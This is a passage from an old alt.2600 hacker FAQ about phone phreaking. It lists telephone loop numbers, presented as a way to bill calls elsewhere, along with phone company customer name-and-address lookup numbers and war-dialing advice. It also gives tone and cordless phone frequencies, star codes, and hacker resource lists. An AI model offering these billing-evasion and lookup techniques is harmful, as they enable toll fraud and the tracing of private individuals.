that's it!  Now the phone bill will go to the loop, and your local

RBOC will get the bill!  Use this technique in moderation, or the loop

may go down.  Loops are probably most useful when you want to talk to

someone to whom you don't want to give your phone number.





14. What is a loop in my area?



Many of these loops are no longer functional.  If you are local

to any of these loops, please try them out an e-mail me the results

of your research.



NPA    High      Low

---  --------  --------

201  228-9929  228-9930

201  238-9929  238-9930

201  251-9929  251-9930

201  254-9929  254-9930

201  272-9929  272-9930

201  330-9929  330-9930

201  333-9929  333-9930

201  339-9929  339-9930

201  347-9929  347-9930

201  376-9929  376-9930

201  398-9929  398-9930

201  467-9929  467-9930

201  528-9929  528-9930

201  531-9929  531-9930

201  558-9929  558-9930

201  559-9929  559-9930

201  560-9929  560-9930

201  592-9929  592-9930

201  625-9929  625-9930

201  631-9929  631-9930

201  637-9929  637-9930

201  655-9929  655-9930

201  666-9929  666-9930

201  690-9929  690-9930

201  761-9929  761-9930

201  762-9929  762-9929

201  762-9929  762-9930

201  763-9929  763-9930

201  764-9929  764-9930

201  767-9929  767-9930

201  768-9929  768-9930

201  773-9929  773-9930

201  879-9929  879-9930

201  938-9929  938-9930

201  946-9929  946-9930

201  992-9929  992-9930

201  993-9929  993-9930

201  994-9929  994-9930

206  827-0018  827-0019

206  988-0020  988-0022

208  862-9996  862-9997

209  732-0044  732-0045

212  220-9977  220-9979

212  283-9977  283-9979

212  283-9977  283-9997

212  352-9900  352-9906

212  365-9977  365-9979

212  529-9900  529-9906

212  562-9977  562-9979

212  986-9977  986-9979

213  360-1118  360-1119

213  365-1118  365-1119

213  455-0002  455-XXXX

213  455-0002  455-xxxx

213  546-0002  546-XXXX

213  546-0002  546-xxxx

213  549-1118  549-1119

214  291-4759  291-4757

214  299-4759  299-4757

305  778-9952  778-9951

305  964-9951  964-9952

307  468-9999  468-9998

308  357-0004  357-0005

312  222-9973  222-9974

312  234-9973  234-9974

313  224-9996  224-9997

313  225-9996  225-9997

313  234-9996  234-9997

313  237-9996  237-9997

313  256-9996  256-9997

313  272-9996  272-9997

313  273-9996  273-9997

313  277-9996  277-9997

313  281-9996  281-9997

313  292-9996  292-9997

313  299-9996  299-9997

313  321-9996  321-9997

313  326-9996  326-9997

313  356-9996  356-9997

313  362-9996  362-9997

313  369-9996  369-9997

313  388-9996  388-9997

313  397-9996  397-9997

313  399-9996  399-9997

313  445-9996  445-9997

313  465-9996  465-9997

313  471-9996  471-9997

313  474-9996  474-9997

313  477-9996  477-9997

313  478-9996  478-9997

313  483-9996  483-9997

313  497-9996  497-9997

313  526-9996  526-9997

313  552-9996  552-9997

313  556-9996  556-9997

313  561-9996  561-9997

313  569-9996  569-9996

313  575-9996  575-9997

313  577-9996  577-9997

313  585-9996  585-9997

313  591-9996  591-9997

313  621-9996  621-9997

313  626-9996  626-9997

313  644-9996  644-9997

313  646-9996  646-9997

313  647-9996  647-9997

313  649-9996  649-9997

313  663-9996  663-9997

313  665-9996  665-9997

313  683-9996  683-9997

313  721-9996  721-9997

313  722-9996  722-9997

313  728-9996  728-9997

313  731-9996  731-9997

313  751-9996  751-9997

313  776-9996  776-9997

313  781-9996  781-9997

313  787-9996  787-9997

313  822-9996  822-9997

313  833-9996  833-9997

313  851-9996  851-9997

313  871-9996  871-9997

313  875-9996  875-9997

313  886-9996  886-9997

313  888-9996  888-9997

313  898-9996  898-9997

313  934-9996  934-9997

313  942-9996  942-9997

313  963-9996  963-9997

313  977-9996  977-9997

315  673-9995  673-9996

315  695-9995  695-9996

402  422-0001  422-0002

402  422-0003  422-0004

402  422-0005  422-0006

402  422-0007  422-0008

402  572-0003  572-0004

402  779-0004  779-0007

406  225-9902  225-9903

517  422-9996  422-9997

517  423-9996  423-9997

517  455-9996  455-9997

517  563-9996  563-9997

517  663-9996  663-9997

517  851-9996  851-9997

609  921-9929  921-9930

609  994-9929  994-9930

616  997-9996  997-9997

713  224-1499  759-1799

713  324-1499  324-1799

713  342-1499  342-1799

713  351-1499  351-1799

713  354-1499  354-1799

713  356-1499  356-1799

713  442-1499  442-1799

713  447-1499  447-1799

713  455-1499  455-1799

713  458-1499  458-1799

713  462-1499  462-1799

713  466-1499  466-1799

713  468-1499  468-1799

713  469-1499  469-1799

713  471-1499  471-1799

713  481-1499  481-1799

713  482-1499  482-1799

713  484-1499  484-1799

713  487-1499  487-1799

713  489-1499  489-1799

713  492-1499  492-1799

713  493-1499  493-1799

713  524-1499  524-1799

713  526-1499  526-1799

713  555-1499  555-1799

713  661-1499  661-1799

713  664-1499  664-1799

713  665-1499  665-1799

713  666-1499  666-1799

713  667-1499  667-1799

713  682-1499  976-1799

713  771-1499  771-1799

713  780-1499  780-1799

713  781-1499  997-1799

713  960-1499  960-1799

713  977-1499  977-1799

713  988-1499  988-1799

714  535-1118  535-1119

714  538-1118  538-1119

714  858-1118  858-1119

714  879-1118  879-1119

714  884-1118  884-1119

805  528-0044  528-0045

805  544-0044  544-0045

805  773-0044  773-0045

808  235-9907  235-9908

808  239-9907  239-9908

808  245-9907  245-9908

808  247-9907  247-9908

808  261-9907  261-9908

808  322-9907  322-9908

808  328-9907  328-9908

808  329-9907  329-9908

808  332-9907  332-9908

808  335-9907  335-9908

808  572-9907  572-9908

808  623-9907  623-9908

808  624-9907  624-9908

808  668-9907  668-9908

808  742-9907  742-9908

808  879-9907  879-9908

808  882-9907  882-9908

808  885-9907  885-9908

808  959-9907  959-9908

808  961-9907  961-9908

813  385-9971

908  776-9930  776-9930





15. What is a CNA number?



CNA stands for Customer Name and Address.  The CNA number is a phone

number for telephone company personnel to call and get the name and

address for a phone number.  If a telephone lineman finds a phone line

he does not recognize, he can use the ANI number to find it's phone

number and then call the CNA operator to see who owns it and where

they live.



Normal CNA numbers are available only to telephone company personnel.

Private citizens may now legally get CNA information from private

companies.  Two such companies are:



Unidirectory    (900)933-3330

Telename        (900)884-1212



Note that these are 900 numbers, and will cost you approximately one

dollar per minute.



If you are in 312 or 708, AmeriTech has a pay-for-play CNA service

available to the general public.  The number is 796-9600.  The cost is

$.35/call and can look up two numbers per call.





16. What is the telephone company CNA number for my area?



203  203-771-8080     CT (All)

516  516-321-5700     Hempstead/Long Island, NY

614  614-464-0123     Columbus/Steubenville, OH

813  813-270-8711     Ft. Meyers/St. Petersburg/Tampa, FL





17. What are some numbers that always ring busy?



216  xxx-9887              Akron/Canton/Cleveland/Lorain/Youngstown, OH

316  952-7265              Dodge City/Wichita, KS

501  377-99xx              AR (All)

719  577-6100 to 577-6200  Colorado Springs/Leadville/Pueblo, CO

818  885-0699              Pasadena, CA

906  632-9999              Marquette/Sault Ste. Marie, MI

906  635-9999              Marquette/Sault Ste. Marie, MI

914  576-9903              Peekskill/Poughkeepsie/White Plains/Yonkers, NY





18. What are some numbers that temporarily disconnect phone service?



404  420        Atlanta, GA                     (5 minutes)

512  200        Austin/Corpus Christi, TX       (1 minute)

516  480        Hempstead/Long Island, NY       (1 minute)

603  980        NH (All)

919  211 or 511 Durham, NC                      (10 min - 1 hour)





19. What is scanning?



Scanning is dialing a large number of telephone numbers in the hope

of finding interesting carriers (computers) or tones.



Scanning can be done by hand, although dialing several thousand

telephone numbers by hand is extremely boring and takes a long time.



Much better is to use a scanning program, sometimes called a war

dialer or a demon dialer.  Currently, the best war dialer available

to PC-DOS users is ToneLoc .99b8.



A war dialer will dial a range of numbers and log what it finds at

each number.  You can then only dial up the numbers that the war

dialer marked as carriers or tones.





20. Is scanning illegal?



Excerpt from: 2600, Spring 1990, Page 27:



-BQ-

In some places, scanning has been made illegal.  It would be hard,

though, for someone to file a complaint against you for scanning since

the whole purpose is to call every number once and only once.  It's

not likely to be thought of as harassment by anyone who gets a single

phone call from a scanning computer.  Some central offices have been

known to react strangely when people start scanning.  Sometimes you're

unable to get a dialtone for hours after you start scanning.  But

there is no uniform policy.  The best thing to do is to first find out

if you've got some crazy law saying you can't do it.  If, as is

likely, there is no such law, the only way to find out what happens is

to give it a try.

-EQ-



It should be noted that a law making scanning illegal was recently

passed in Colorado Springs, CO.  It is now illegal to place a call

in Colorado Springs without the intent to communicate.





21. Where can I purchase a lineman's handset?



Contact East

335 Willow Street

North Andover, MA 01845-5995

(508)682-2000



Jensen Tools

7815 S. 46th Street

Phoenix, AZ 85044-5399



Time Motion Tools

12778 Brookprinter Place

Poway, CA 92064

(619)679-0303





22. What are the DTMF frequencies?



DTMF stands for Dual Tone Multi Frequency.  These are the tones you

get when you press a key on your telephone touchpad.  The tone of the

button is the sum of the column and row tones.  The ABCD keys do not

exist on standard telephones.



	 1209 1336 1477 1633

 

     697   1    2    3    A



     770   4    5    6    B



     852   7    8    9    C



     941   *    0    #    D





23. What are the frequencies of the telephone tones?



Type                Hz          On      Off

---------------------------------------------------------------------

Dial Tone         350 & 400     ---     ---

Busy Signal       480 & 620     0.5     0.5

Toll Congestion   480 & 620     0.2     0.3

Ringback (Normal) 440 & 480     2.0     4.0

Ringback (PBX)    440 & 480     1.5     4.5

Reorder (Local)   480 & 620     3.0     2.0

Invalid Number    200 & 400

Hang Up Warning 1400 & 2060     0.1     0.1

Hang Up         2450 & 2600     ---     ---





24. What are all of the * codes?



Local Area Signalling Services (LASS) and Custom Calling Feature

Control Codes:



(These appear to be standard, but may be changed locally)



*57 Customer Orignated Trace (COT) Activation

*60 Selective Call Rejection (SCR) Activation

*61 Selective Distinctive Alerting (SDA) Activation

*62 Selective Call Acceptance (SCA) Activation

*63 Selective Call Forwarding (SCF) Activation

*65 ICLID Activation (caller ID)

*66 Automatic Recall (AR) Activation

*67 Call Privacy Toggle

*68 Computer Access Restriction Toggle

*68 Computer Access Restriction Toggle

*69 AC Activation

*70 Call waiting disable

*71 Ring, no-answer forward activation

*72 Call forwarding immediate Activation

*73 Call forwarding Deactivation

*74 Speed call 8 program

*80 SCR Deactivation

*81 SDA Deactivation

*82 SCA Deactivation

*83 SCF Deactivation

*85 ICLID Deactivation

*86 AR Deactivation

*89 AC Deactivation





25. What frequencies do cordless phones operate on?



Here are the frequencies for the first generation 46/49mhz phones.

The new 900mhz cordless phones are not covered.



Channel    Handset Transmit    Base Transmit

-------    ----------------    -------------

   1          49.670mhz          46.610mhz

   2          49.845             46.630

   3          49.860             46.670

   4          49.770             46.710

   5          49.875             46.730

   6          49.830             46.770

   7          49.890             46.830

   8          49.930             46.870

   9          49.990             46.930

  10          49.970             46.970









Section C: Resources

~~~~~~~~~~~~~~~~~~~~





01. What are some ftp sites of interest to hackers?



aql.gatech.edu                                          (40Hex)

bellcore.com                                            (Bellcore)

bric-a-brac.apple.com

cert.org                                                (CERT)

ftp.clark.net           /pub/jcase/

ftp.csua.berkeley.edu

coast.cs.purdue.edu

crimelab.com

deimos.cs.uah.edu

f.ms.uky.edu            /pub/misc

fc.net                  /pub/defcon                     (DefCon)

freeside.com                                            (Phrack)

ftp.armory.com          /pub/user/kmartind/prog

ftp.clark.net           /pub/jcase

ftp.csua.berkeley.edu   /pub/cypherpunks                (Crypto)

ftp.eff.org             /pub/cud                        (EFF)

ftp.elelab.nsc.co.jp    /pub/security/omron.co.jp/tools

ftp.etext.org                                           (Etext)

ftp.fh-berlin.de                                        (Wordlists)

ftp.mcs.com             /mcsnet.users/crisadm/stuff/research/samples (Virii)

ftp.netcom.com          /pub/zzyzx

ftp.netcom.com          /pub/bradleym                   (Virii)

ftp.rahul.net           /pub/lps                        (Home of the FAQ)

ftp.std.com             /obi/Mischief/ and /archives/alt.locksmithing

ftp.sunet.se            /pub/network/monitoring         (Ethernet sniffers)

ftp.warwick.ac.uk

ftp.win.tue.nl

ftp.winternet.com       /users/craigb

garbo.uwasa.fi          /pc/crypt                       (Crypto)

ghost.dsi.unimi.it      /pub/crypt                      (Crypto)

granuaile.ieunet.ie

gregorio.stanford.edu

grind.isca.uiwa.edu

halcyon.com

ideal.ios.net

lcs.mit.edu                                             (Telecom archives)

martigny.ai.mit.edu

mary.iia.org            /pub/users/patriot

nic.funet.fi            /pub/doc/cud

paradox1.denver.colorado.edu  /anonymous/text-files/pyrotechnics/

pyrite.rutgers.edu

rena.dit.co.jp

ripem.msu.edu           /pub/crypt                      (Ripem)

rs1.rrz.uni-koeln.de                                    (Wordlists)

rtfm.mit.edu                                            (Etext)

sable.ox.ac.uk                                          (Wordlists)

sekurity.com                                            (TNO)

spy.org                                                 (CSC)

theta.iis.u-tokyo.ac.jp /pub1/security

titania.mathematik.uni-ulm.de

uceng.uc.edu

wimsey.bc.ca            /pub/crypto                     (Crypto)

world.std.com





02. What are some newsgroups of interest to hackers?





alt.2600                Do it 'til it hertz

alt.2600.hope.tech      Technology concerns for Hackers on Planet Earth 1994

alt.cellular

alt.dcom.telecom

alt.hackers

alt.locksmithing        You locked your keys in *where*?

alt.hackers.malicious   The really bad guys - don't take candy from them

alt.privacy.anon-server

alt.security            Security issues on computer systems

alt.security.index      Pointers to good stuff in misc.security (Moderated)

alt.security.keydist    Exchange of keys for public key encryption systems

alt.security.pgp        The Pretty Good Privacy package

alt.security.ripem      A secure email system illegal to export from the US

comp.dcom.cellular

comp.dcom.telcom.tech

comp.dcom.telecom       Telecommunications digest (Moderated)

comp.dcom.telecom.tech

comp.org.cpsr.announce

comp.org.cpsr.talk

comp.org.eff

comp.org.eff

comp.protocols.kerberos

comp.protocols.tcp-ip

comp.risks

comp.security.announce

comp.security.misc      Security issues of computers and networks

comp.security.unix      Discussion of Unix security

comp.virus              Computer viruses & security (Moderated)

misc.security           Security in general, not just computers (Moderated)

rec.pyrotechnics

sci.crypt               Different methods of data en/decryption





03. What are some telnet sites of interest to hackers?



phred.pc.cc.cmu.edu





04. What are some gopher sites of interest to hackers?



gopher.cpsr.org

gopher.eff.org

gopher.phred.org

gopher.wired.com

oss.net

wiretap.spies.com





05. What are some World wide Web (WWW) sites of interest to hackers?



http://crimelab.com//bugtraq/bugtraq/html

http://cs.purdue.edu/homes/spaf/coast.html

http://cs.purdue.edu/homes/spaf/pcert.html

http://dfw.net/~aleph1

http://first.org

http://l0pht.com

http://tamsun.tamu.edu/~clm3840/hacking.html/

http://tansu.com.au/Info/security.html

http://the-tech.mit.edu                         (LaMacchia case info)

http://www.achilles.net/~pluvius

http://www.brad.ac.uk/~nasmith/index.html

http://www.contrib.andrew.cmu.edu:8001/usr/dscw/home.html

http://www.cpsr.org/home

http://www.digicash.com/ecash/ecash-home.html   (Digital Cash)

http://www.engin.umich.edu/~jgotts/boxes.html   (Box info)

http://www.engin.umich.edu/~jgotts/underground.html

http://www.fc.net/defcon                        (DefCon Info)

http://www.ic.gov                               (The CIA)

http://www.iia.org/~gautier/me.html

http://www.net23.com

http: /www.paranoia.com /defcon

http://www.phantom.com/~king

http://www.phred.org

http://www.spy.org /Security/Local/News

http://www.tis.com/

http://www.wired.com





06. What are some IRC channels of interest to hackers?



#2600

#cellular

#hack

#phreak

#linux

#root

#unix

#warez





07. What are some BBS's of interest to hackers?



Hacker's Haven          (303)343-4053

Corrupt Sekurity        (303)753-1719

Independent Nation      (315)656-4179

underworld_1994.com     (514)683-1894

Digital Fallout         (516)378-6640

Alliance Communications (612)251-8596

Apocalypse 2000         (708)676-9855

fARM R0Ad 666           (713)855-0261





08. What books are available on this subject?





General Computer Security

~~~~~~~~~~~~~~~~~~~~~~~~~

Computer Security Basics

Author: Deborah Russell and G.T. Gengemi Sr.

Publisher: O'Reilly & Associates, Inc.

Copyright Date: 1991

ISBN: 0-937175-71-4



	This is an excellent book.  It gives a broad overview of

	computer security without sacrificing detail.  A must read for

	the beginning security expert.



Computer Security Management

Author: Karen Forcht

Publisher: Boyd and Fraser

Copyright Date: 1994

ISBN: 0-87835-881-1



Information Systems Security

Author: Philip Fites and Martin Kratz

Publisher: Van Nostrad Reinhold

Copyright Date: 1993

ISBN: 0-442-00180-0





Unix System Security

~~~~~~~~~~~~~~~~~~~~

Practical Unix Security

Author: Simson Garfinkel and Gene Spafford

Publisher: O'Reilly & Associates, Inc.

Copyright Date: 1991

ISBN: 0-937175-72-2



	Finally someone with a very firm grasp of Unix system security

	gets down to writing a book on the subject.  Buy this book.

	Read this book.



Firewalls and Internet Security

Author: William Cheswick and Steven Bellovin

Publisher: Addison Wesley

Copyright Date: 1994

ISBN: 0-201-63357-4



Unix System Security

Author: Rik Farrow

Publisher: Addison Wesley

Copyright Date: 1991

ISBN: 0-201-57030-0



Unix Security: A Practical Tutorial

Author: N. Derek Arnold

Publisher: McGraw Hill

Copyright Date: 1993

ISBN: 0-07-002560-6



Unix System Security: A Guide for Users and Systems Administrators

Author: David A. Curry

Publisher: Addison-Wesley

Copyright Date: 1992

ISBN: 0-201-56327-4



Unix System Security

Author: Patrick H. Wood and Stephen G. Kochan

Publisher: Hayden Books

Copyright Date: 1985

ISBN: 0-672-48494-3





Network Security

~~~~~~~~~~~~~~~~

Network Security Secrets

Author: David J. Stang and Sylvia Moon

Publisher: IDG Books

Copyright Date: 1993

ISBN: 1-56884-021-7



	Not a total waste of paper, but definitely not worth the

	$49.95 purchase price.  The book is a rehash of previously

	published information.  The only secret we learn from reading

	the book is that Sylvia Moon is a younger woman madly in love

	with the older David Stang.



Complete Lan Security and Control

Author: Peter Davis

Publisher: Windcrest / McGraw Hill

Copyright Date: 1994

ISBN: 0-8306-4548-9 and 0-8306-4549-7



Network Security

Author: Steven Shaffer and Alan Simon

Publisher: AP Professional

Copyright Date: 1994

ISBN: 0-12-638010-4





Cryptography

~~~~~~~~~~~~

Applied Cryptography: Protocols, Algorithms, and Source Code in C

Author: Bruce Schneier

Publisher: John Wiley & Sons

Copyright Date: 1994

ISBN: 0-471-59756-2



	Bruce Schneier's book replaces all other texts on

	cryptography.  If you are interested in cryptography, this is

	a must read.  This may be the first and last book on

	cryptography you may ever need to buy.



Cryptography and Data Security

Author: Dorothy Denning

Publisher: Addison-Wesley Publishing Co.

Copyright Date: 1982

ISBN: 0-201-10150-5



Protect Your Privacy: A Guide for PGP Users

Author: William Stallings

Publisher: Prentice-Hall

Copyright Date: 1994

ISBN: 0-13-185596-4





Programmed Threats

~~~~~~~~~~~~~~~~~~

The Little Black Book of Computer Viruses

Author: Mark Ludwig

Publisher: American Eagle Publications

Copyright Date: 1990

ISBN: 0-929408-02-0



	The original, and still the best, book on computer viruses.

	No media hype here, just good clean technical information.



Computer Viruses, Artificial Life and Evolution

Author: Mark Ludwig

Publisher: American Eagle Publications

Copyright Date: 1993

ISBN: 0-929408-07-1



Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other

	Threats to Your System

Author: John McAfee and Colin Haynes

Publisher: St. Martin's Press

Copyright Date: 1989

ISBN: 0-312-03064-9 and 0-312-02889-X



The Virus Creation Labs: A Journey Into the Underground

Author: George Smith

Publisher: American Eagle Publications

Copyright Date: 1994

ISBN:





Telephony

~~~~~~~~~

Engineering and Operations in the Bell System

Author: R.F. Rey

Publisher: Bell Telephont Laboratories

Copyright Date: 1983

ISBN: 0-932764-04-5



        Although hopelessly out of date, this book remains *THE* book

        on telephony.  This book is 100% Bell, and is loved by phreaks

        the world over.



Telephony: Today and Tomorrow

Author: Dimitris N. Chorafas

Publisher: Prentice-Hall

Copyright Date: 1984

ISBN: 0-13-902700-9



The Telecommunications Fact Book and Illustrated Dictionary

Author: Ahmed S. Khan

Publisher: Delmar Publishers, Inc.

Copyright Date: 1992

ISBN: 0-8273-4615-8



        I find this dictionary to be an excellent reference book on

        telephony, and I recommend it to anyone with serious

        intentions in the field.





Hacking History and Culture

~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Hacker Crackdown: Law and Disorder on the Electronic Frontier

Author: Bruce Sterling

Publisher: Bantam Books

Copyright Date: 1982

ISBN: 0-553-56370-X



	Bruce Sterling has recently released the book FREE to the net.

	The book is much easier to read in print form, and the

	paperback is only $5.99.  Either way you read it, you will be

	glad you did.  Mr. Sterling is an excellent science fiction

	author and has brought his talent with words to bear on the

	hacking culture.  A very enjoyable reading experience.



Cyberpunk

Author: Katie Hafner and John Markoff

Publisher: Simon and Schuster

Copyright Date: 1991

ISBN: 0-671-77879-X



The Cuckoo's Egg

Author: Cliff Stoll

Publisher: Simon and Schuster

Copyright Date: 1989

ISBN: 0-671-72688-9



Hackers: Heroes of the Computer Revolution

Author: Steven Levy

Publisher: Doubleday

Copyright Date: 1984

ISBN: 0-440-13495-6





Unclassified

~~~~~~~~~~~~

The Hacker's Handbook

Author: Hugo Cornwall

Publisher: E. Arthur Brown Company

Copyright Date:

ISBN: 0-912579-06-4



Secrets of a Super Hacker

Author: The Knightmare

Publisher: Loompanics

Copyright Date: 1994

ISBN: 1-55950-106-5



	The Knightmare is no super hacker.  There is little or no real

	information in this book.  The Knightmare gives useful advice

	like telling you not to dress up before going trashing.

	The Knightmare's best hack is fooling Loompanics into

	publishing this garbage.



The Day The Phones Stopped

Author: Leonard Lee

Publisher: Primus / Donald I Fine, Inc.

Copyright Date: 1992

ISBN: 1-55611-286-6



	Total garbage.  Paranoid delusions of a lunatic.  Less factual

	data that an average issue of the Enquirer.



Information Warfare

Author: Winn Swartau

Publisher: Thunder Mountain Press

Copyright Date: 1994

ISBN: 1-56025-080-1



An Illustrated Guide to the Techniques and Equipment of Electronic Warfare

Author: Doug Richardson

Publisher: Salamander Press

Copyright Date:

ISBN: 0-668-06497-8





09. What are some mailing lists of interest to hackers?



Academic Firewalls

Reflector Address:

Registration Address: Send a message to majordomo@greatcircle.com

                      containing the line "subscribe firewalls user@host"



Bugtraq

Reflector Address:    bugtraq@crimelab.com

Registration Address: bugtraq-request@crimelab.com



Cert Tools

Reflector Address:    cert-tools@cert.org

Registration Address: cert-tools-request@cert.org



Computers and Society

Reflector Address:    Comp-Soc@limbo.intuitive.com

Registration Address: taylor@limbo.intuitive.com



Coordinated Feasibility Effort to Unravel State Data

Reflector Address:    ldc-sw@cpsr.org

Registration Address:



CPSR Announcement List

Reflector Address:    cpsr-announce@cpsr.org

Registration Address:



CPSR - Intellectual Property

Reflector Address:    cpsr-int-prop@cpsr.org

Registration Address:



CPSR - Internet Library

Reflector Address:    cpsr-library@cpsr.org

Registration Address:



DefCon Announcement List

Reflector Address:

Registration Address: Send a message to majordomo@fc.net containing

                      the line "subscribe dc-announce"



DefCon Chat List

Reflector Address:

Registration Address: Send a message to majordomo@fc.net containing

                      the line "subscribe dc-stuff"



Macintosh Security

Reflector Address:    mac-security@eclectic.com

Registration Address: mac-security-request@eclectic.com



NeXT Managers

Reflector Address:

Registration Address: next-managers-request@stolaf.edu



rfc931-users

Reflector Address:    rfc931-users@kramden.acf.nyu.edu

Registration Address: brnstnd@nyu.edu



RSA Users

Reflector Address:    rsaref-users@rsa.com

Registration Address: rsaref-users-request@rsa.com





10. What are some print magazines of interest to hackers?



2600 - The Hacker Quarterly

~~~~~~~~~~~~~~~~~~~~~~~~~~~

E-mail address: 2600@well.sf.ca.us



Subscription Address: 2600 Subscription Dept

                      PO Box 752

                      Middle Island, NY  11953-0752



Letters and article submission address: 2600 Editorial Dept

                                        PO Box 99

                                        Middle Island, NY  11953-0099



Subscriptions: United States: $21/yr individual, $50 corporate.

               Overseas: $30/yr individual, $65 corporate.





Gray Areas

~~~~~~~~~~

Gray Areas examines gray areas of law and morality and subject matter

which is illegal, immoral and/oe controversial. Gray Areas explores

why hackers hack and puts hacking into a sociological framework of

deviant behavior.



E-Mail Address: grayarea@well.sf.ca.us

E-Mail Address: grayarea@netaxs.com



U.S. Mail Address: Gray Areas

                   PO Box 808

                   Broomall, PA 19008



Subscriptions: $26.00 4 issues first class

               $34.00 4 issues foreign (shipped air mail)





Wired

~~~~~

Subscription Address: subscriptions@wired.com

                  or: Wired

                      PO Box 191826

                      San Francisco, CA 94119-9866



Letters and article submission address: guidelines@wired.com

                                    or: Wired

                                        544 Second Street

                                        San Francisco, CA 94107-1427



Subscriptions: $39/yr (US) $64/yr (Canada/Mexico) $79/yr (Overseas)





Nuts & Volts

~~~~~~~~~~~~

T& L Publications

430 Princeland Court

Corona, CA 91719

(800)783-4624 (Voice)

(909)371-8497 (Voice)

(909)371-3052 (Fax)

CIS: 74262,3663





11. What are some organizations of interest to hackers?



Computer Professionals for Social Responsibility (CPSR)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CPSR empowers computer professionals and computer users to advocate

for the responsible use of information technology and empowers all who

use computer technology to participate in the public debate.   As

technical experts, CPSR members provide the public and policymakers

with realistic assessments of the power, promise, and limitations of

computer technology.  As an organization of concerned citizens, CPSR

directs public attention to critical choices concerning the

applications of computing and how those choices affect society.



By matching unimpeachable technical information with policy

development savvy, CPSR uses minimum dollars to have maximum impact

and encourages broad public participation in the shaping of technology

policy.



Every project we undertake is based on five principles:



*  We foster and support public discussion of and public

   responsibility for decisions involving the use of computers in

   systems critical to society.



*  We work to dispel popular myths about the infallibility of

   technological systems.



*  We challenge the assumption that technology alone can solve

   political and social problems.



*  We critically examine social and technical issues within the

   computer profession, nationally and internationally.



*  We encourage the use of computer technology to improve the quality

   of life.



CPSR Membership Categories

  75  REGULAR MEMBER

  50  Basic member

 200  Supporting member

 500  Sponsoring member

1000  Lifetime member

  20  Student/low income member

  50  Foreign subscriber

  50  Library/institutional subscriber



CPSR National Office

P.O. Box 717

Palo Alto, CA  94301

415-322-3778

415-322-3798 (FAX)

E-mail: cpsr@csli.stanford.edu





Electronic Frontier Foundation (EFF)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Electronic Frontier Foundation (EFF) is dedicated to the pursuit

of policies and activities that will advance freedom and openness in

computer-based communications. It is a member-supported, nonprofit

group that grew from the conviction that a new public interest

organization was needed in the information age; that this organization

would enhance and protect the democratic potential of new computer

communications technology. From the beginning, the EFF determined to

become an organization that would combine technical, legal, and public

policy expertise, and would apply these skills to the myriad issues

and concerns that arise whenever a new communications medium is born.



Memberships are $20.00 per year for students, $40.00 per year for

regular members, and $100.00 per year for organizations.



The Electronic Frontier Foundation, Inc.

666 Pennsylvania Avenue S.E., Suite 303

Washington, D.C.  20003

+1 202 544 9237

+1 202 547 5481 FAX

Internet: eff@eff.org





Free Software Foundation (FSF)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





GNU

~~~





The League for Programming Freedom (LPF)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The League for Programming Freedom is an organization of people who

oppose the attempt to monopolize common user interfaces through "look

and feel" copyright lawsuits.  Some of us are programmers, who worry

that such monopolies will obstruct our work.  Some of us are users,

who want new computer systems to be compatible with the interfaces we

know.  Some are founders of hardware or software companies, such as

Richard P. Gabriel. Some of us are professors or researchers,

including John McCarthy, Marvin Minsky, Guy L. Steele, Jr., Robert S.

Boyer and Patrick Winston.



"Look and feel" lawsuits aim to create a new class of government-

enforced monopolies broader in scope than ever before.  Such a system

of user-interface copyright would impose gratuitous incompatibility,

reduce competition, and stifle innovation.



We in the League hope to prevent these problems by preventing

user-interface copyright.  The League is NOT opposed to copyright law

as it was understood until 1986 -- copyright on particular programs.

Our aim is to stop changes in the copyright system which would take

away programmers' traditional freedom to write new programs compatible

with existing programs and practices.



Annual dues for individual members are $42 for employed professionals,

$10.50 for students, and $21 for others.  We appreciate activists, but

members who cannot contribute their time are also welcome.



To contact the League, phone (617) 243-4091, send Internet mail to the

address league@prep.ai.mit.edu, or write to:



League for Programming Freedom

1 Kendall Square #143

P.O. Box 9171

Cambridge, MA 02139 USA





SotMesc

~~~~~~~

Founded in 1989, SotMesc is dedicated to preserving the integrity and

cohesion of the computing society.  By promoting computer education,

liberties and efficiency, we believe we can secure freedoms for all

computer users while retaining privacy.



SotMesc maintains the CSP Internet mailing list, the SotMesc

Scholarship Fund, and the SotMesc Newsletter.



The SotMESC is financed partly by membership fees, and donations, but

mostly by selling hacking, cracking, phreaking, electronics, internet,

and virus information and programs on disk and bound paper media.



SotMesc memberships are $20 to students and $40 to regular members.



SotMESC

P.O. Box 573

Long Beach, MS  39560





12. Where can I purchase a magnetic stripe encoder/decoder?



CPU Advance

PO Box 2434

Harwood Station

Littleton, MA  01460

(508)624-4819 (Fax)



Omron Electronics, Inc.

One East Commerce Drive

Schaumburg, IL  60173

(800)556-6766 (Voice)

(708)843-7787 (Fax)



Security Photo Corporation

1051 Commonwealth Avenue

Boston, MA 02215

(800)533-1162 (Voice)

(617)783-3200 (Voice)

(617)783-1966 (Voice)



Timeline Inc,

23605 Telo Avenue

Torrence, CA 90505

(800)872-8878 (Voice)

(800)223-9977 (Voice)









Section D: 2600

~~~~~~~~~~~~~~~



01. What is alt.2600?



Alt.2600 is a Usenet newsgroup for discussion of material relating to

2600 Magazine, the hacker quarterly.   It is NOT for the Atari 2600

game machine.  Len@netsys.com created the group on Emmanuel

Goldstein's recommendation.  Emmanuel is the editor/publisher of 2600

Magazine. Following the barrage of postings about the Atari machine to

alt.2600, an alt.atari.2600 was created to divert all of the atari

traffic from alt.2600.  Atari 2600 people are advised to hie over to

rec.games.video.classic.





02. What does "2600" mean?



	2600Hz was a tone that was used by early phone phreaks (or

phreakers) in the 80's, and some currently.  If the tone was sent down the

line at the proper time, one could get away with all sorts of fun stuff.  



A note from Emmanuel Goldstein:

	

"The Atari 2600 has NOTHING to do with blue boxes or telephones

or the 2600 hertz tone.  The 2600 hertz tone was simply the first

step towards exploring the network.  If you were successful at 

getting a toll call to drop, then billing would stop at that

point but there would be billing for the number already dialed

up until the point of seizure.  800 numbers and long distance

information were both free in the past and records of who called

what were either non-existent or very obscure with regards to

these numbers.  This, naturally, made them more popular than

numbers that showed up on a bill, even if it was only for

a minute.  Today, many 800 numbers go overseas, which provides

a quick and free way into another country's phone system

which may be more open for exploration."





03. Are there on-line versions of 2600 available?



	No.





04. I can't find 2600 at any bookstores.  What can I do?



Subscribe.  Or, let 2600 know via the subscription address that you

